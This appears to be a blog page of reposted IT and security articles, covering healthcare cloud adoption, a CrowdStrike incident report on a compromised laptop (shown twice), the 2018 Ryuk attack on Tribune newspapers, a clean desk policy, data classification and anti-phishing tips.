Wellman of Comanche County Memorial Hospital said they are on track to move just about everything to a cloud/remote-hosted setting with very little left onsite.

“This currently includes our ambulatory applications, financials, time and attendance, and as we move to a new acute care application, we are requiring it to be offsite,” he explained. “We are in the process of selecting a new acute care EHR and we expect it to be offsite as well. In the past we felt the interfacing and processing power should all be local, but as we have experimented over the years we felt this is no longer an issue with speed, assuming you have robust ISPs with multiple pathways to reduce the chance of excessive downtime.”

These three healthcare executives are generous when it comes to what they feel a healthcare organization can put in the cloud. Is there anything they feel should not be in the cloud?

"We are very careful with our patient data, we have taken a strong stance on the security aspect of that, constantly making sure that it is as good if not better than self-hosted."

Eli Tarlow, Brookdale University Hospital and Medical Center

“We really have not found anything that cannot go to the cloud, although some associated performance issues could cause you to not pursue it wholly,” Wellman said. “For example, we see the benefit of pushing our DICOM images to the cloud, but only in a hybrid design where we have onsite equipment that can receive from the modalities and then push the image to a cloud without causing a delay in that process.”

A good hybrid design would allow the organization to appropriately size and maintain the onsite storage to build an image cache and allow for pre-fetching larger images to avoid excessive wait times when a provider wants older images for comparison such as mammography, he explained.

“I would also like to point out that this model is preferable to our facility because we are in tornado alley on the Oklahoma plains, so this is a big part of our disaster recovery and business continuity plans,” he added. “It is easier and much more affordable for us to establish emergency network connectivity than it is to build or contract for a fully functional secondary data center. That played a big role in our decision to move toward the cloud.”

Still some concern among CIOs

Right now, healthcare organizations remain slow to adopt cloud methodology for the use of protected health information, contended Earle of Kaleida Health.

“Among the reasons why is that there has to be a constant that the data does not leave the United States or countries that value intellectual property and patient confidentiality or sensitive data,” he said. “Until the businesses can guarantee that your data does not move outside of the areas and controls or some kind of geo-fence of that data, it becomes less and less practical that healthcare providers would whole-heartedly put their sensitive data into the cloud.”

It is starting to happen, though. Cloud companies now are starting to accommodate PHI and related rules and practices, he said.

“They are starting to put those guardrails onto the data, but there still is some level of hesitation among CIOs around the country to adopt the cloud solutions until there is much more comfort around the resiliency of that data within the cloud,” Earle said. “There has to be some level of breakthrough when it comes to the vendors that are offering cloud services and their complete understanding of how health delivery organizations operate and do all of the constraints.”

What should a CIO say to concerned peers in the C-suite asking questions about security? Tarlow of Brookdale University Hospital and Medical Center points to some standard activities within the IT department.

“We do routine audits on this every single year; we run a security audit against it to make sure,” he said. “But I would reverse the challenge and say what if it’s onsite, what additional technologies, personnel, bells and whistles, would we have onsite that we do not already have in the cloud? Aside from someone breaking into our building, but we have security guards and I assume all of the cloud vendors have security guards.”

Cloud vendors have deeper pockets

The cloud vendors can afford the redundancies that individual healthcare organizations may not be able to afford independently, he added.

“I would educate the executives on the risks and hazards and on the benefits of doing it onsite versus offsite, so they can really learn,” he said. “It is a scary world out there. It’s really about becoming the most secure.”

He added that he was CIO at Bellevue Hospital during Superstorm Sandy. The majority of that organization’s systems were offsite, including the EHR, he said.

“The hospital was challenged, patients were discharged to other hospitals because we had to evacuate,” he concluded. “It helped us that our EHR was hosted remotely. These are not things in our dreams anymore, these are things that are really happening. And they are validating our strategy.”

Resource: https://www.healthcareitnews.com/news/infrastructure-reality-check-what-can-go-cloud-really/page/0/1?mkt_tok=eyJpIjoiTlRnNE5EQmtOalJtTlRZeCIsInQiOiJmUDl4TkJqTDVKNDlCOCsxbm5waGVsM3A4S2hoVmt6NzI4UEVGcHFINWV2RWo3anhQNEVuemRPcWRNQVVKXC85YmU2SkhDQWdkOTJpVnhKUzQ0dVlyNlwvUVUzMkxybUZWUVFiUTFjUXUzTGRRMDJEbGljWjdKQnV5K0J3T3NvK3R1In0%3D

  0 Comments
0 Comments
Continue reading

How One Hacked Laptop Led to an Entire Network Being Compromised

A corporate laptop being used in a coffee shop at a weekend was enough to allow a sophisticated cybercrime group to compromise an organization’s entire infrastructure.cybersecurity laptop

The incident began when an employee of the manufacturer took their laptop to a coffee shop and used it to visit the website of one of the firm's partners.

The security researchers said the user visited the site after being directed there by a phishing email -- and that the site had been compromised by FakeUpdates, a malware and social engineering campaign affecting thousands of Joomla and Wordpress sites.

The malware shows users pop-ups which claim their browser software needs updating. In this instance, the laptop was then infected with the Dridex banking trojan and the PowerShell Empire post-exploit toolset.

The security software being used by the clothing company -- Crowdstrike didn't name the vendor -- relied on devices being inside the corporate network to pick up threats. As the laptop was being used outside the network, this incident didn't become apparent until the laptop was back in the office -- by which time it was too late.

The infected laptop then served as an entry point for the attackers to compromise the corporate network, allowing the attackers to use PowerShell exploit to access dozens of systems that could be compromised by taking advantage of the user's permissions.

The attackers were also able to gather additional privileged account credentials by using Mimikatz, an open-source utility used to retrieve clear text credentials and hashes from memory, to gain access to servers and further move across the network.

"Local administrator privileges made it easier for the threat actor to access a multitude of endpoints by accessing just one account that linked them all. Once access to the domain was gained, it left the organization completely exposed," Bryan York, director of professional services at Crowdstrike told ZDNet.

This exposure allowed the attackers to install Framework POS malware on the retail store server with the intention of stealing credit card data.

Researchers have identified a cyber criminal group they call Indrik Spider as the culprits of the attack. The hacking operation has been active since 2014 and is heavily associated with Dridex and BitPaymer ransomware campaigns, which are thought to have netted the attackers millions of dollars.

It's the first time Indrik Spider has been associated with FakeUpdates, indicating that the group is expanding its operations as it continues to find new means of illicitly making money. Crowdstrike wouldn't say whether the campaign was successful in its goal or if credit card data was stolen from the company -- but there are lessons that organizations should take on board to avoid falling victim to similar campaigns.

Crowdstrike recommends that accounts should be segregated, and that end users shouldn't be given administrator privileges on their local systems. In this incident, the adversary abused a misconfiguration within the company's Active Directory that provided unnecessary privileges -- so the security firm recommends that organizations should regularly review Active Directory configurations across the entire global enterprise.

"Attackers used PowerShell or Windows Management Instrumentation in 20 percent of the cases we saw this year and businesses need to know how to better detect and protect against these," said York.

Resource: https://www.zdnet.com/article/how-one-hacked-laptop-led-to-an-entire-network-being-compromised/

  0 Comments
0 Comments
Continue reading

How one hacked laptop led to an entire network being compromised

A corporate laptop being used in a coffee shop at a weekend was enough to allow a sophisticated cybercrime group to compromise an organization’s entire infrastructure.

The incident began when an employee of the manufacturer took their laptop to a coffee shop and used it to visit the website of one of the firm's partners.

The security researchers said the user visited the site after being directed there by a phishing email -- and that the site had been compromised by FakeUpdates, a malware and social engineering campaign affecting thousands of Joomla and Wordpress sites.

The malware shows users pop-ups which claim their browser software needs updating. In this instance, the laptop was then infected with the Dridex banking trojan and the PowerShell Empire post-exploit toolset.

The security software being used by the clothing company -- Crowdstrike didn't name the vendor -- relied on devices being inside the corporate network to pick up threats. As the laptop was being used outside the network, this incident didn't become apparent until the laptop was back in the office -- by which time it was too late.

The infected laptop then served as an entry point for the attackers to compromise the corporate network, allowing the attackers to use PowerShell exploit to access dozens of systems that could be compromised by taking advantage of the user's permissions.

The attackers were also able to gather additional privileged account credentials by using Mimikatz, an open-source utility used to retrieve clear text credentials and hashes from memory, to gain access to servers and further move across the network.

"Local administrator privileges made it easier for the threat actor to access a multitude of endpoints by accessing just one account that linked them all. Once access to the domain was gained, it left the organization completely exposed," Bryan York, director of professional services at Crowdstrike told ZDNet.

This exposure allowed the attackers to install Framework POS malware on the retail store server with the intention of stealing credit card data.

Researchers have identified a cyber criminal group they call Indrik Spider as the culprits of the attack. The hacking operation has been active since 2014 and is heavily associated with Dridex and BitPaymer ransomware campaigns, which are thought to have netted the attackers millions of dollars.

It's the first time Indrik Spider has been associated with FakeUpdates, indicating that the group is expanding its operations as it continues to find new means of illicitly making money. Crowdstrike wouldn't say whether the campaign was successful in its goal or if credit card data was stolen from the company -- but there are lessons that organizations should take on board to avoid falling victim to similar campaigns.

Crowdstrike recommends that accounts should be segregated, and that end users shouldn't be given administrator privileges on their local systems. In this incident, the adversary abused a misconfiguration within the company's Active Directory that provided unnecessary privileges -- so the security firm recommends that organizations should regularly review Active Directory configurations across the entire global enterprise.

"Attackers used PowerShell or Windows Management Instrumentation in 20 percent of the cases we saw this year and businesses need to know how to better detect and protect against these," said York.

Resource: https://www.zdnet.com/article/how-one-hacked-laptop-led-to-an-entire-network-being-compromised/

  0 Comments
0 Comments
Continue reading

Malware attack disrupts delivery of L.A. Times and Tribune papers across the U.S.

What first arose as a server outage was identified Saturday as a malware attack, which appears to have originated from outside the United States and hobbled computer malware attack dec 2018systems and delayed weekend deliveries of the Los Angeles Times and other newspapers across the country.

Technology teams worked feverishly to quarantine the computer virus, but it spread through Tribune Publishing’s network and reinfected systems crucial to the news production and printing process. Multiple newspapers around the country were affected because they share a production platform.

The attack delayed distribution of Saturday editions of the Los Angeles Times and San Diego Union Tribune. It also stymied distribution of the West Coast editions of the Wall Street Journal and New York Times, which are printed at the Los Angeles Times’ Olympic printing plant in downtown Los Angeles.

By Saturday afternoon, the company suspected the cyberattack originated from outside the United States, but officials said it was too soon to say whether it was carried out by a foreign state or some other entity, said a source with knowledge of the situation.

“We believe the intention of the attack was to disable infrastructure, more specifically servers, as opposed to looking to steal information,” said the source, who spoke on condition of anonymity because he was not authorized to comment publicly. The source would not detail what evidence led the company to believe the breach came from overseas.

Tribune Publishing said in a statement Saturday that “the personal data of our subscribers, online users, and advertising clients has not been compromised. We apologize for any inconvenience and thank our readers and advertising partners for their patience as we investigate the situation.”

“Every market across the company was impacted,” said Marisa Kollias, spokeswoman for Tribune Publishing. She declined to provide specifics on the disruptions, but the company’s properties include the Chicago Tribune; Baltimore Sun; Capital Gazette in Annapolis, Md.; Hartford Courant; New York Daily News; South Florida Sun Sentinel and Orlando Sentinel.

No other details about the origin of the attack were immediately available and the motive remained unclear.

Tribune Publishing sold The Times and the San Diego Union-Tribune to Los Angeles biotech entrepreneur Dr. Patrick Soon-Shiong in June, but the two companies continue to share various systems, including software.

It’s unclear how many Times subscribers were impacted by late deliveries and the paper could not provide firm numbers, but a source said that a majority received their papers Saturday morning, albeit several hours late. The Times said that print subscribers who did not get their papers Saturday would receive them with their regularly scheduled delivery of the Sunday edition.

“We apologize to our customers for this inconvenience,” The Times said in a statement. “Thank you for your patience and support as we respond to this ongoing matter.”

The Times and the San Diego paper became aware of the problem near midnight on Thursday. Programmers worked to isolate the bug, which Tribune Publishing identified as a malware attack, but at every turn the programmers ran into additional issues trying to access a myriad of files, including advertisements that needed to be added to the pages or paid obituaries.

After identifying the server outage as a virus, technology teams made progress Friday quarantining it and bringing back servers, but some of their security patches didn’t hold and the virus began to reinfect the network, impacting a series of servers used for news production and manufacturing processes.

By late Friday, the attack was hindering the transmission of pages from offices across Southern California to printing presses as publication deadlines approached.

At one point, Times staffers were making contingency plans to hand-deliver pages from the editorial offices in El Segundo to its Olympic printing plant in downtown Los Angeles. Working through the problems created a logjam at the plant, and the resulting cascade of delays pushed back printing and delivery.

San Diego was particularly hard hit by the problem, in large part because of the paper’s position in the press run. Between 85% and 90% of the Saturday edition of the Union-Tribune did not reach subscribers on Saturday morning, said Jeff Light, publisher and editor of the San Diego Union-Tribune.

“Papers that should have arrived in San Diego around 3 a.m. to 4 a.m. instead arrived at 7 a.m. and 8 a.m.” Light said. Because the newspaper relies on independent contractors to deliver the paper to neighborhoods, many of those people were not available later in the day to do the deliveries.

The first signs of trouble at the Union-Tribune came late Thursday night when sports editors tried to send information, via digital files, to the plate-making facility. But those digital files which contain information that ultimately becomes the pages of the newspaper would not transmit to the plate-making process. Editors seemed to be locked out of the system, having to perform work-arounds.

The transmission of community editions, including the Glendale News Press and Burbank Leader, also appeared in doubt Friday night. Ultimately, a page designer in Orange County figured out he could send all the community papers’ news pages from his unaffected computer, said John Canalis, executive editor of Times Community News.

The problem caused widespread issues in South Florida, one of Tribune Publishing’s major markets. The South Florida Sun Sentinel told readers that it had been “crippled this weekend by a computer virus that shut down production and hampered phone lines,” according to a story on its website.

Malware attacks are extremely common, affecting millions of computers in homes, offices and other organizations every day, said Salim Neino, chief executive of the company Kryptos Logic.

In some cases, dubbed “ransomware,” the attackers disable the system and demand money, said Neino, whose company tackled a major ransomware attack called WannaCry last year.

In other instances, the goal is simply to disrupt or “break stuff” by wiping systems, Neino said. Malware has also been used to quietly infect computers and then sell access to other cybercriminals, who can steal banking credentials or exploit other valuable information, Neino said.

Several individuals with knowledge of the Tribune situation said the attack appeared to be in the form of “Ryuk” ransomware. One company insider, who was not authorized to comment publicly, said the corrupted Tribune Publishing computer files contained the extension “.ryk.”

“Ryuk” attacks are “highly targeted, well-resourced and planned,” according to an August advisory by the U.S. Department of Health and Human Services’ cybersecurity program. Victims are deliberately targeted and “only crucial assets and resources are infected in each targeted network.”

It was unclear whether company officials have been in contact with law enforcement regarding the suspected attack. But Katie Waldman, a spokeswoman for the Department of Homeland Security, said “we are aware of reports of a potential cyber incident effecting several news outlets, and are working with our government and industry partners to better understand the situation.”

Tribune declined to comment on the specifics of the malware attack.

Neino also said that tracking the identity of attackers can be difficult since malware code is often freely distributed online.

For instance, even if an attack appears to be Russian because of the “malware family traits,” Neino said, “code still could have been sourced, weaponized and deployed by an actor who downloaded it from an underground forum anywhere in the world.”

Pam Dixon, executive director of the World Privacy Forum, a nonprofit public interest research group, said that “usually when someone tries to disrupt a significant digital resource like a newspaper, you're looking at an experienced and sophisticated hacker.”

Dixon added that the holidays are "a well known time for mischief" by digital troublemakers, because organizations are more thinly staffed.

"It's an optimal time to attack a major target," she said.

The highest-profile cyberattack of a media company was in late 2014 at Sony Pictures Entertainment in Culver City. Hackers, which the FBI later determined were affiliated with the North Korean government, broke into Sony Pictures’ computer system and copied huge chunks of data, which they later posted online for the world to see.

Resource: https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html

  0 Comments
0 Comments
Continue reading

5 Benefits to Having a Clean Desk Policy

One of the simplest ways to become compliant with basic privacy and security principles, increase productivity, and have a great-looking office is to implement a Clean Desk clean desk policyPolicy.

A clean desk policy and a clear screen policy work hand-in-hand to safeguard your organization’s sensitive information.

What is a Clean Desk Policy?

A clean desk policy instructs that all employees must clear their desks at the end of each work day. This not only includes documents and notes, but any post-it notes, businesses cards, and removable media (e.g. USB memory sticks).

Following a clean desk policy will help your organization reduce the risk of information theft, fraud, or a security breach caused by sensitive information being left unattended and visible in plain view.

The Benefits of a Clean Desk Policy

A clean desk policy should be adopted because of the numerous benefits it can provide your organization.

1. Save Time and Money

A clean desk policy will encourage employees to use digital versions of documents, significantly reducing your organization’s costs of paper, ink toner, and printer maintenance.

2. Make Good Impressions

Who knows who and when someone will visit your office? A clean and tidy workspace makes your organization look efficient and presentable to anyone who decides to visit, including the auditors!

3. Easy ISO Compliance

A clean desk policy is not only ISO 27001/17799 compliant, it also complies with basic privacy principles.

4. Discourages Prying Eyes

Employees usually leave sensitive information on their desk.

Post-it notes are usually the worst culprit, containing names, phone numbers, and even user names and passwords visible in plain view. These habits encourage dishonest employees, cleaning crews, and maintenance staff to view information they should not have access to.

5. Reduce Stress

A place for everything and everything in its place. When your employees are organized they can spend more time concentrating on work rather than feeling stressed because they can’t find a report due in the next 10 minutes.

Implementing a Clean Desk Policy

You are convinced that your organization needs a clean desk policy. Great! Here are a few steps to help you implement a policy.

Put it in Writing

A clean desk policy should be in writing and communicated to all employees, especially during introductory and refresher training. Consequences for failure to comply should be serious yet practical, especially if your organization works with much sensitive information. Have all employees sign the document for approval.

Add a Reminder to Email Signatures

You have probably seen it below many email signatures: Please consider the environment before printing this email. If your organization uses standardized email signatures, consider having this reminder added to the bottom.

Lockable Storage

You can’t implement a clean desk policy if you have no where for employees to put their documents. Consider purchasing small, lockable storage boxes for employees that fit under their desk.

Encourage Electronic Documents

Have employees work with electronic documents whenever possible. Without the need to print and work with physical papers, your employees will always have a clear desk whenever they log out of their computers.

Get Rid of Documents Securely

Your employees should never throw any work-related documents into the waste basket. Once garbage leaves your company’s doors, it becomes public property. Nothing can ruin your organization quicker than careless employees throwing sensitive information into a waste basket. Your organization does not want to be on the front page of the newspaper for exposing sensitive information.

Perform Routine Backups

If you discourage employees from using physical documents, make sure your organization has a dependable backup routine in place. Employees need to know that their documents will be safe in the event of a power loss or hard-drive crash.

Enforcing a Clean Desk Policy

Implementing a clean desk policy and having a nonchalant attitude towards enforcement will render your policy useless.

Random Checks

Have someone conduct random weekly checks, possibly at the end of a work day. All papers, notes, post-its, or any other documents containing sensitive information should be shredded immediately. Removable media, such as CDs, floppy disks, or memory sticks can be confiscated temporarily.

Upper Management Support

A clean desk policy needs to be taken seriously — especially with all levels of management. If your employees see that upper management does not have to abide by the policy, they will soon lose faith.

The fact that upper management usually handles more sensitive documents should reinforce the need for a clean desk policy for all employees regardless of their status within the organization.

Resource: http://www.privacysense.net/clean-desk-policy/

  0 Comments
0 Comments
Continue reading

7 Steps to Effective Data Classification

In today’s security landscape, data protection is not just a legal necessity, it’s critical to organizational survival and profitability.data categorization

Storage is cheap, and organizations have become data hoarders. One day — they think — they’ll get around to mining all of that data for something useful. But data hoarding can cause serious issues. Much of what is collected may be redundant, obsolete, trivial (ROT) or unknown (dark), and hasn’t been touched in years.

Storage may be cheap, but it’s not free. Storing massive amounts of data unnecessarily increases costs and more importantly, it puts your organization at risk.

Sensitive information that is stored digitally — including intellectual property, personally identifying information about customers or employees, such as social security numbers, protected health information (PHI) and/or financial account information and credit card details — needs to be properly secured. Your organization is not secure if finding important data is like looking for a needle in a haystack.

Keys to Success

While data classification is the foundation of any effort to ensure sensitive data is handled appropriately, many organizations fail to set the right expectations and approach. This leads implementations to become overly complex and fail to produce practical results.

There are 7 steps to effective data classification:

  1. Complete a risk assessment of sensitive data. Ensure a clear understanding of the organization’s regulatory and contractual privacy and confidentiality requirements and define your data classification objectives through an interview-based approach that involves key stakeholders, including compliance, legal and business unit leaders.
  2. Develop a formalized classification policy. Resist the urge to get too granular, as granular classification schemes tend to cause confusion and become unmanageable. Three to four classification categories is reasonable. Solidify employees’ roles and responsibilities. Policies and procedures should be well-defined, aligned with the sensitivity of specific data types, and easily interpreted by employees.
  3. Categorize the types of data. Determining what types of sensitive data exist within your organization can present challenges. It is an effort that should be organized around business processes and driven by process owners. Consider each business process – tracking the flow of data provides insight to what data needs to be protected, and how it should be protected. Consider the following questions:
  • • What customer and partner data does your organization collect?
    • What data do you create about them?
    • What proprietary data do you create?
    • What transactional data do you deal with?
    • Of all the collected and created data, what is confidential?
  1. Discover the location of your data. After establishing the types of data in your organization, it’s important to catalog all of the places data is stored electronically. The flow of data into and out of the organization is a key consideration. How does your organization store and share data internally and externally? Do you use cloud-based services like Dropbox, Box, OneDrive, etc.? What about mobile devices?

Data discovery tools can help generate an inventory of unstructured data and help you understand exactly where your company’s data is stored, regardless of the format or location. These tools also help address difficulties around identifying data owners by providing insights about users who are handling data. In your discovery efforts, you can incorporate key words or specific types or formats of data, such as medical record numbers, social security numbers or credit card numbers.

  1. Identify and classify data. Only after you know where your data is stored can you identify and then classify it, so it’s appropriately protected. Consider the penalties associated with a loss or breach. For example, what fines can be levied per record for a HIPAA breach involving protected health information? Insight into the potential costs associated with the compromise of a data set will enable you to set expectations for the cost to protect it and which classification level to set.

Commercial classification tools support data classification initiatives by facilitating the determination of appropriate classifications and then applying the classification label either to the metadata of the item or as a watermark. Robust classification systems offer user-driven, system-suggested and automated capabilities:

  • • Provision of a menu of tailored data classification options.
    • Detection of content within a data item followed by the offering of classification options for selection by the user.
    • Automation through which the system selects the appropriate classification based on analysis engines with limited (if any) user input.
  1. Enable controls. Establish baseline cybersecurity measures and define policy-based controls for each data classification label to ensure the appropriate solutions are in place. High-risk data requires more advanced levels of protection while lower-risk data requires less protection. By understanding where data resides and the organizational value of the data, you can implement appropriate security controls based on associated risks. Classification metadata can be used by data loss prevention (DLP), encryption and other security solutions to determine what information is sensitive and how it should be protected.
  2. Monitor and maintain. Be prepared to monitor and maintain the organization’s data classification system, making updates as necessary. Classification policies should be dynamic. You need to establish a process for review and update that involves users to encourage adoption and ensure your approach continues to meet the changing needs of the business.

Be Selective

Full data classification is an expensive and cumbersome activity that few companies are equipped to handle. A good retention policy can help whittle down data sets and facilitate your efforts. Start by selecting specific types of data to classify in line with your confidentiality requirements, adding more security for increasingly confidential data.

All Data is Not Created Equal

From the time information is created until it is destroyed, data classification can help your organization ensure it is effectively protected, stored and managed. Putting data classification at the heart of your data protection strategy allows you to reduce risks to sensitive data, enhance decision-making and increase the effectiveness of DLP, encryption and other security controls. By creating a straightforward classification scheme, comprehensively assessing and locating data, and implementing the right solutions, your organization can benefit from a simplified, streamlined way to ensure that sensitive data is handled appropriately and reduce threats to your business.

Resource: https://www.siriuscom.com/2018/03/7-steps-effective-data-classification/

  0 Comments
0 Comments
Continue reading

Spam and Phishing: Avoid Being a Victim

Cybercriminals have become quite savvy in their attempts to lure people in and get you to click on a link or open an attachment.

Tips for Avoiding Being a Victim

  • Don’t reveal personal or financial information in an email, and do not respond to email solicitations for this information. This includes following links sent in email.spam and phishing
  • Before sending or entering sensitive information online, check the security of the website.
  • Pay attention to the website’s URL. Malicious websites may look identical to a legitimate site, but the URL may use a variation in spelling or a different domain (e.g., .com versus .net).
  • If you are unsure whether an email request is legitimate, try to verify it by contacting the company directly. Contact the company using information provided on an account statement, not information provided in an email. Check out the Anti-Phishing Working Group(APWG) to learn about known phishing attacks and/or report phishing.
  • Keep a clean machine.Keep all software on internet-connected devices – including PCs, smartphones and tablets – up to date to reduce risk of infection from malware.

What to Do if You Are a Victim

  • Report it to the appropriate people within the organization, including network administrators. They can be alert for any suspicious or unusual activity.
  • If you believe your financial accounts may be compromised, contact your financial institution immediately and close the account(s).
  • Watch for any unauthorized charges to your account.
  • Consider reporting the attack to your local police department, and file a report with the Federal Trade Commission or the Internet Crime Complaint Center.

Protect Yourself With These STOP. THINK. CONNECT.™ Tips

  • When in doubt, throw it out: Links in email, tweets, posts and online advertising are often how cybercriminals try to compromise your information. If it looks suspicious, even if you know the source, it’s best to delete or – if appropriate – mark it as junk.
  • Think before you act: Be wary of communications that implores you to act immediately, offers something that sounds too good to be true or asks for personal information.
  • Make your password a sentence: A strong password is a sentence that is at least 12 characters long. Focus on positive sentences or phrases that you like to think about and are easy to remember (for example, “I love country music.”). On many sites, you can even use spaces!
  • Unique account, unique password: Having separate passwords for every account helps to thwart cybercriminals. At a minimum, separate your work and personal accounts and make sure that your critical accounts have the strongest passwords.
  • Lock down your login:Fortify your online accounts by enabling the strongest authentication tools available, such as biometrics, security keys or a unique one-time code through an app on your mobile device. Your usernames and passwords are not enough to protect key accounts like email, banking and social media.

Resource: https://staysafeonline.org/stay-safe-online/online-safety-basics/spam-and-phishing/

  0 Comments
0 Comments
Continue reading
TOP